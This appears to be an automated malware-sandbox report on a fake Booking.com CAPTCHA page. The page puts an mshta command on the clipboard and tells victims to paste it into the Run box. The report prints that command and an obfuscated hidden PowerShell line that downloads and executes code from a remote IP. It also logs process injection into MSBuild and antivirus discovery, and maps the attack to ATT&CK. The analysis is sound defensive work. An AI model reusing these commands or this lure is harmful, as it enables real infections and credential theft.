                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\scoped_dir5580_533688855
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File deleted: C:\Windows\SystemTemp\scoped_dir5580_533688855
                Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: classification engine Classification label: mal100.phis.expl.evad.win@33/22@29/137
                Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\5IQBCSP1\rq3xYUErWsFPbHiX[1].htm
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\lUbbhwIMKp
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sex42yrg.b54.ps1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\svchost.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
                Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,6627453953828994574,1927372697243055533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://roombedsrewiews.com"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306''
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                Data Obfuscation

                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: Yara matchFile source: 00000010.00000002.1645128494.0000020F80402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1645128494.0000020F8049A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2010937734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2022674073.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"

                Persistence and Installation Behavior

                Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub 2; booking.raombedsrewiews.com/sign-in?op_token =zXJ81EgVvYXVOaCKyAQaUN103Mm91T2QzNk5uN3prM3BpcmgSCWF1dGhvcm16ZRoaaHROcHM6Ly... Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privacy - Terms Verification Steps 1. Press Windows Button C + R 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 28/03/2025
                Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub 2; booking.raombedsrewiews.com/sign-in?op_token =zXJ81EgVvYXVOaCKyAQaUN103Mm91T2QzNk5uN3prM3BpcmgSCWF1dGhvcm16ZRoaaHROcHM6Ly... Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot Privacy - Verification Steps 1. Press Windows Button C + R 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 28/03/2025
                Source: Chrome DOM: 0.2OCR Text: Booking.com Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privacy - Terms Verification Steps 1 Press Windows Button + R 2 Press CTRL + V 3. Press Enter
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306''
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\toaudqqy.dll
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1630000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3150000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F80000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 547
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7976
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1893
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4291
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\toaudqqy.dll
                Source: C:\Windows\System32\svchost.exe TID: 7024Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 8040Thread sleep count: 547 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 7976 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 1893 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep count: 393 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 772Thread sleep count: 323 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6252Thread sleep count: 4291 > 30
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 410000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 412000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FEF008
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP"
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 2 Browser Extensions | 211 Process Injection | 11 Masquerading | OS Credential Dumping | 3 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 211 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 34 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

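| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://roombedsrewiews.com | 0% | Avira URL Cloud | safe | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\toaudqqy.dll | 100% | Avira | TR/Dropper.Gen7 | |
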
                No Antivirus matches
                No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| 261-nrz-371.mktoresp.com | 134.213.193.62 | true | false | | unknown |
| a.nel.cloudflare.com | 35.190.80.1 | true | false | | high |
| code.jquery.com | 151.101.66.137 | true | false | | high |
| adult-hub1990.cfd | 172.64.80.1 | true | true | | unknown |
| prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net | 104.17.208.240 | true | false | | high |
| roombedsrewiews.com | 172.67.207.52 | true | true | | unknown |
| booking.roombedsrewiews.com | 104.21.61.69 | true | true | | unknown |
| www.google.com | 142.250.64.68 | true | false | | high |
| partner.booking.com | 18.164.96.110 | true | false | | unknown |
| ip-api.com | 208.95.112.1 | true | false | | high |
| e10776.b.akamaiedge.net | 23.204.6.193 | true | false | | high |
| siteintercept.qualtrics.com | unknown | unknown | false | | high |
| munchkin.marketo.net | unknown | unknown | false | | high |
| zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com | unknown | unknown | false | | unknown |

Name | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                    unknown
                                                                                                                                                                    https://booking.roombedsrewiews.com/static/afalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://partner.booking.com/themes/custom/booking/images/favicons/favicon.svgfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://roombedsrewiews.com/false
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                        high
